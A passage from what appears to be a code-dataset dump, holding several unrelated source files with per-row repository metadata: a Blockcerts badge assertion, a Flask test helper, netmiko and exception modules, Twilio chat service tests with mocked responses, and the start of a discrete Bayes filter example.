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" class="sc-jzJRlG bvIClq" style="width: 179px; height: 28px;" width="179" height="28" /></div>',
'id': 'urn:uuid:eff07e73-f0d1-47d5-99a1-74ca59e66d80',
'issuedOn': '2020-04-29T12:14:21.414121+00:00',
'recipient': {'hashed': False, 'identity': 'phaws@mail.com', 'type': 'email'},
'recipientProfile': {'name': 'Phaws',
'publicKey': '-',
'type': ['RecipientProfile', 'Extension']},
'signature': {'anchors': [{'chain': 'ethereumRopsten',
'sourceId': '0x0b54d876f976d03698ad17f47b8a7b7ffd94d90192056862b2a290c29db7fb89',
'type': 'ETHData'}],
'merkleRoot': '23338312ec71501d91d5f08ab32d8f6c69a66efc25e3eae9feb7ff65cf1a4514',
'proof': [{'right': 'c99d979aa7fcfed93bcb5c00044e65b361d9feb8a86fa93af6c67d2093068bef'},
{'right': 'cc2ba45bbaae7b380e049c2f654b7a4545206ffe49d4f0e83151fda19da3bd30'}],
'targetHash': '93e0724b10a6856e5882803935671e128784e5e6959f5a0e4c16ed00987d4f58',
'type': ['MerkleProof2017', 'Extension']},
'type': 'Assertion',
'verification': {'publicKey': '0x472C1a6080a84694990BA2B9a29Ceef672c91d31',
'type': ['MerkleProofVerification2017', 'Extension']}}
def throws(response: flask.Response, error: Type[AppError]) -> bool:
"""Assert that the given response is an instance of the given error object."""
assert error.code == response.status_code, response.status_code
assert error.slugify_exception_name() == response.json.get('error'), response.json
return True
| 1,036.474227
| 53,236
| 0.947905
| 6,752
| 201,076
| 28.212974
| 0.349082
| 0.004368
| 0.004116
| 0.001428
| 0.986031
| 0.985637
| 0.984661
| 0.983973
| 0.983553
| 0.982398
| 0
| 0.140496
| 0.014069
| 201,076
| 193
| 53,237
| 1,041.84456
| 0.820396
| 0.000497
| 0
| 0.202381
| 0
| 0.065476
| 0.977793
| 0.943026
| 0
| 1
| 0.000537
| 0
| 0.017857
| 1
| 0.065476
| false
| 0
| 0.053571
| 0.005952
| 0.136905
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
24cf59bcb37d6dd71bb326cbe95313d1b14ccdc5
| 112
|
py
|
Python
|
netmiko/h3c/__init__.py
|
TanY0Y0/netmiko
|
585c9f0dd4a08608c5019341eb6546f4c8c28138
|
[
"MIT"
] | 1
|
2020-12-11T00:48:09.000Z
|
2020-12-11T00:48:09.000Z
|
netmiko/h3c/__init__.py
|
TanY0Y0/netmiko
|
585c9f0dd4a08608c5019341eb6546f4c8c28138
|
[
"MIT"
] | null | null | null |
netmiko/h3c/__init__.py
|
TanY0Y0/netmiko
|
585c9f0dd4a08608c5019341eb6546f4c8c28138
|
[
"MIT"
] | null | null | null |
from netmiko.h3c.h3c import H3CSSH
from netmiko.h3c.h3c import H3CTelnet
__all__ = ["H3CSSH", "H3CTelnet"]
| 22.4
| 38
| 0.741071
| 15
| 112
| 5.266667
| 0.466667
| 0.278481
| 0.35443
| 0.43038
| 0.582278
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 0.151786
| 112
| 4
| 39
| 28
| 0.747368
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
24fdf9b18041b922fdf768f920a5987bbeb98f9d
| 218
|
py
|
Python
|
baseconverter/exceptions.py
|
antoniovilarinholopes/converttodecimal
|
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
|
[
"MIT"
] | null | null | null |
baseconverter/exceptions.py
|
antoniovilarinholopes/converttodecimal
|
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
|
[
"MIT"
] | null | null | null |
baseconverter/exceptions.py
|
antoniovilarinholopes/converttodecimal
|
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.4
class InvalidDigitForBaseException(RuntimeError):
def __init__(self, arg):
self.args = arg
class NotAllNumCharsException(RuntimeError):
def __init__(self, arg):
self.args = arg
| 21.8
| 49
| 0.720183
| 24
| 218
| 6.208333
| 0.541667
| 0.201342
| 0.255034
| 0.308725
| 0.496644
| 0.496644
| 0.496644
| 0.496644
| 0
| 0
| 0
| 0.01105
| 0.169725
| 218
| 9
| 50
| 24.222222
| 0.812155
| 0.087156
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
709a2d251a5aff5211450a28d997a345d6c9a558
| 1,456
|
py
|
Python
|
shldn/tests/test-data/div.py
|
arrieta/shldn
|
8335aaeb1bfe91698bd9dfb83487393ede9225e6
|
[
"MIT"
] | null | null | null |
shldn/tests/test-data/div.py
|
arrieta/shldn
|
8335aaeb1bfe91698bd9dfb83487393ede9225e6
|
[
"MIT"
] | null | null | null |
shldn/tests/test-data/div.py
|
arrieta/shldn
|
8335aaeb1bfe91698bd9dfb83487393ede9225e6
|
[
"MIT"
] | null | null | null |
if __name__ == "__main__":
print("Hello Division World!")
print("Here are a few divisions:")
print(f"1 / 2 = {1/2:3.3}")
print(f"10 / 2 = {10/2}")
print(f"(71 / 23) / 53.32 = {(71 / 23) / 53.32:3.3}")
def pilin():
print("Hello Division World!")
print("Here are a few divisions:")
print(f"1 / 2 = {1/2:3.3}")
print(f"10 / 2 = {10/2}")
print(f"(71 / 23) / 53.32 = {(71 / 23) / 53.32:3.3}")
1/4
| 1.402697
| 57
| 0.151099
| 79
| 1,456
| 2.683544
| 0.303797
| 0.169811
| 0.113208
| 0.150943
| 0.90566
| 0.90566
| 0.90566
| 0.90566
| 0.90566
| 0.90566
| 0
| 0.189602
| 0.775412
| 1,456
| 1,037
| 58
| 1.40405
| 0.458716
| 0
| 0
| 0.769231
| 0
| 0.153846
| 0.171703
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.076923
| true
| 0
| 0
| 0
| 0.076923
| 0.769231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
5606a370ce800e3e412bddb3dfe82416cafb10e3
| 22,828
|
py
|
Python
|
tests/integration/chat/v1/test_service.py
|
angmunpri/twilio-python
|
d6ed1098f4bc06529d68f965eabdf87642ac441c
|
[
"MIT"
] | null | null | null |
tests/integration/chat/v1/test_service.py
|
angmunpri/twilio-python
|
d6ed1098f4bc06529d68f965eabdf87642ac441c
|
[
"MIT"
] | null | null | null |
tests/integration/chat/v1/test_service.py
|
angmunpri/twilio-python
|
d6ed1098f4bc06529d68f965eabdf87642ac441c
|
[
"MIT"
] | null | null | null |
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ServiceTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://chat.twilio.com/v1/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"consumption_report_interval": 100,
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"limits": {
"channel_members": 100,
"user_channels": 250
},
"links": {
"channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
"users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
"roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
},
"notifications": {},
"post_webhook_url": "post_webhook_url",
"pre_webhook_url": "pre_webhook_url",
"reachability_enabled": false,
"read_status_enabled": false,
"sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"typing_indicator_timeout": 100,
"url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"webhook_filters": [
"webhook_filters"
],
"webhook_method": "webhook_method",
"webhooks": {}
}
'''
))
actual = self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://chat.twilio.com/v1/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v1.services.create(friendly_name="friendly_name")
values = {'FriendlyName': "friendly_name", }
self.holodeck.assert_has_request(Request(
'post',
'https://chat.twilio.com/v1/Services',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"consumption_report_interval": 100,
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"limits": {
"channel_members": 100,
"user_channels": 250
},
"links": {
"channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
"users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
"roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
},
"notifications": {},
"post_webhook_url": "post_webhook_url",
"pre_webhook_url": "pre_webhook_url",
"reachability_enabled": false,
"read_status_enabled": false,
"sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"typing_indicator_timeout": 100,
"url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"webhook_filters": [
"webhook_filters"
],
"webhook_method": "webhook_method",
"webhooks": {}
}
'''
))
actual = self.client.chat.v1.services.create(friendly_name="friendly_name")
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v1.services.list()
self.holodeck.assert_has_request(Request(
'get',
'https://chat.twilio.com/v1/Services',
))
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0",
"key": "services",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0"
},
"services": []
}
'''
))
actual = self.client.chat.v1.services.list()
self.assertIsNotNone(actual)
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0",
"key": "services",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0"
},
"services": [
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"consumption_report_interval": 100,
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"limits": {
"user_channels": 250,
"channel_members": 100,
"actions_per_second": 30
},
"links": {
"channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
"users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
"roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
},
"notifications": {
"added_to_channel": {
"enabled": false,
"template": "notifications.added_to_channel.template"
},
"invited_to_channel": {
"enabled": false,
"template": "notifications.invited_to_channel.template"
},
"log_enabled": true,
"new_message": {
"enabled": false,
"template": "notifications.new_message.template"
},
"removed_from_channel": {
"enabled": false,
"template": "notifications.removed_from_channel.template"
}
},
"post_webhook_url": "post_webhook_url",
"pre_webhook_url": "pre_webhook_url",
"reachability_enabled": false,
"read_status_enabled": false,
"sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"typing_indicator_timeout": 100,
"url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"webhook_filters": [
"webhook_filters"
],
"webhook_method": "webhook_method",
"webhooks": {
"on_channel_add": {
"format": "webhooks.on_channel_add.format",
"method": "webhooks.on_channel_add.method",
"url": "webhooks.on_channel_add.url"
},
"on_channel_added": {
"format": "webhooks.on_channel_added.format",
"method": "webhooks.on_channel_added.method",
"url": "webhooks.on_channel_added.url"
},
"on_channel_destroy": {
"format": "webhooks.on_channel_destroy.format",
"method": "webhooks.on_channel_destroy.method",
"url": "webhooks.on_channel_destroy.url"
},
"on_channel_destroyed": {
"format": "webhooks.on_channel_destroyed.format",
"method": "webhooks.on_channel_destroyed.method",
"url": "webhooks.on_channel_destroyed.url"
},
"on_channel_update": {
"format": "webhooks.on_channel_update.format",
"method": "webhooks.on_channel_update.method",
"url": "webhooks.on_channel_update.url"
},
"on_channel_updated": {
"format": "webhooks.on_channel_updated.format",
"method": "webhooks.on_channel_updated.method",
"url": "webhooks.on_channel_updated.url"
},
"on_member_add": {
"format": "webhooks.on_member_add.format",
"method": "webhooks.on_member_add.method",
"url": "webhooks.on_member_add.url"
},
"on_member_added": {
"format": "webhooks.on_member_added.format",
"method": "webhooks.on_member_added.method",
"url": "webhooks.on_member_added.url"
},
"on_member_remove": {
"format": "webhooks.on_member_remove.format",
"method": "webhooks.on_member_remove.method",
"url": "webhooks.on_member_remove.url"
},
"on_member_removed": {
"format": "webhooks.on_member_removed.format",
"method": "webhooks.on_member_removed.method",
"url": "webhooks.on_member_removed.url"
},
"on_message_remove": {
"format": "webhooks.on_message_remove.format",
"method": "webhooks.on_message_remove.method",
"url": "webhooks.on_message_remove.url"
},
"on_message_removed": {
"format": "webhooks.on_message_removed.format",
"method": "webhooks.on_message_removed.method",
"url": "webhooks.on_message_removed.url"
},
"on_message_send": {
"format": "webhooks.on_message_send.format",
"method": "webhooks.on_message_send.method",
"url": "webhooks.on_message_send.url"
},
"on_message_sent": {
"format": "webhooks.on_message_sent.format",
"method": "webhooks.on_message_sent.method",
"url": "webhooks.on_message_sent.url"
},
"on_message_update": {
"format": "webhooks.on_message_update.format",
"method": "webhooks.on_message_update.method",
"url": "webhooks.on_message_update.url"
},
"on_message_updated": {
"format": "webhooks.on_message_updated.format",
"method": "webhooks.on_message_updated.method",
"url": "webhooks.on_message_updated.url"
}
}
}
]
}
'''
))
actual = self.client.chat.v1.services.list()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.holodeck.assert_has_request(Request(
'post',
'https://chat.twilio.com/v1/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"consumption_report_interval": 100,
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"limits": {
"channel_members": 500,
"user_channels": 600
},
"links": {
"channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
"users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
"roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
},
"notifications": {
"added_to_channel": {
"enabled": false,
"template": "notifications.added_to_channel.template"
},
"invited_to_channel": {
"enabled": false,
"template": "notifications.invited_to_channel.template"
},
"new_message": {
"enabled": false,
"template": "notifications.new_message.template"
},
"removed_from_channel": {
"enabled": false,
"template": "notifications.removed_from_channel.template"
}
},
"post_webhook_url": "post_webhook_url",
"pre_webhook_url": "pre_webhook_url",
"reachability_enabled": false,
"read_status_enabled": false,
"sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"typing_indicator_timeout": 100,
"url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"webhook_filters": [
"webhook_filters"
],
"webhook_method": "webhook_method",
"webhooks": {
"on_channel_add": {
"format": "webhooks.on_channel_add.format",
"method": "webhooks.on_channel_add.method",
"url": "webhooks.on_channel_add.url"
},
"on_channel_added": {
"format": "webhooks.on_channel_added.format",
"method": "webhooks.on_channel_added.method",
"url": "webhooks.on_channel_added.url"
},
"on_channel_destroy": {
"format": "webhooks.on_channel_destroy.format",
"method": "webhooks.on_channel_destroy.method",
"url": "webhooks.on_channel_destroy.url"
},
"on_channel_destroyed": {
"format": "webhooks.on_channel_destroyed.format",
"method": "webhooks.on_channel_destroyed.method",
"url": "webhooks.on_channel_destroyed.url"
},
"on_channel_update": {
"format": "webhooks.on_channel_update.format",
"method": "webhooks.on_channel_update.method",
"url": "webhooks.on_channel_update.url"
},
"on_channel_updated": {
"format": "webhooks.on_channel_updated.format",
"method": "webhooks.on_channel_updated.method",
"url": "webhooks.on_channel_updated.url"
},
"on_member_add": {
"format": "webhooks.on_member_add.format",
"method": "webhooks.on_member_add.method",
"url": "webhooks.on_member_add.url"
},
"on_member_added": {
"format": "webhooks.on_member_added.format",
"method": "webhooks.on_member_added.method",
"url": "webhooks.on_member_added.url"
},
"on_member_remove": {
"format": "webhooks.on_member_remove.format",
"method": "webhooks.on_member_remove.method",
"url": "webhooks.on_member_remove.url"
},
"on_member_removed": {
"format": "webhooks.on_member_removed.format",
"method": "webhooks.on_member_removed.method",
"url": "webhooks.on_member_removed.url"
},
"on_message_remove": {
"format": "webhooks.on_message_remove.format",
"method": "webhooks.on_message_remove.method",
"url": "webhooks.on_message_remove.url"
},
"on_message_removed": {
"format": "webhooks.on_message_removed.format",
"method": "webhooks.on_message_removed.method",
"url": "webhooks.on_message_removed.url"
},
"on_message_send": {
"format": "webhooks.on_message_send.format",
"method": "webhooks.on_message_send.method",
"url": "webhooks.on_message_send.url"
},
"on_message_sent": {
"format": "webhooks.on_message_sent.format",
"method": "webhooks.on_message_sent.method",
"url": "webhooks.on_message_sent.url"
},
"on_message_update": {
"format": "webhooks.on_message_update.format",
"method": "webhooks.on_message_update.method",
"url": "webhooks.on_message_update.url"
},
"on_message_updated": {
"format": "webhooks.on_message_updated.format",
"method": "webhooks.on_message_updated.method",
"url": "webhooks.on_message_updated.url"
}
}
}
'''
))
actual = self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
| 46.587755
| 122
| 0.471833
| 1,668
| 22,828
| 6.161871
| 0.083333
| 0.095349
| 0.062853
| 0.068496
| 0.952228
| 0.94639
| 0.936369
| 0.935396
| 0.918272
| 0.90358
| 0
| 0.0192
| 0.42277
| 22,828
| 489
| 123
| 46.683027
| 0.760795
| 0.004775
| 0
| 0.611765
| 1
| 0
| 0.15812
| 0.05812
| 0
| 0
| 0
| 0
| 0.188235
| 1
| 0.129412
| false
| 0
| 0.047059
| 0
| 0.188235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
560f735af0caf01032dd148675978faeb4bdbb0e
| 3,722
|
py
|
Python
|
examples/ex_bayes_filter.py
|
KayaDevSolutions/deepgaze
|
a6d444c70bb75ffcfc23d3b31a0567711fb956a7
|
[
"MIT"
] | 1,653
|
2016-05-06T02:56:08.000Z
|
2022-03-26T16:34:30.000Z
|
examples/ex_bayes_filter.py
|
KayaDevSolutions/deepgaze
|
a6d444c70bb75ffcfc23d3b31a0567711fb956a7
|
[
"MIT"
] | 94
|
2016-04-09T04:40:08.000Z
|
2022-03-31T08:52:17.000Z
|
examples/ex_bayes_filter.py
|
KayaDevSolutions/deepgaze
|
a6d444c70bb75ffcfc23d3b31a0567711fb956a7
|
[
"MIT"
] | 514
|
2016-08-28T01:47:56.000Z
|
2022-01-30T13:42:39.000Z
|
from deepgaze.bayes_filter import DiscreteBayesFilter
import numpy as np
my_filter = DiscreteBayesFilter(10)
belief = np.array([1.0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=np.float32)
cpt_motion_model = np.array([[0.8, 0.1, 0, 0, 0, 0, 0, 0, 0, 0.1],
[0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0, 0],
[0, 0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0],
[0, 0, 0.1, 0.8, 0.1, 0, 0, 0, 0, 0],
[0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0, 0],
[0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0],
[0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0],
[0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0],
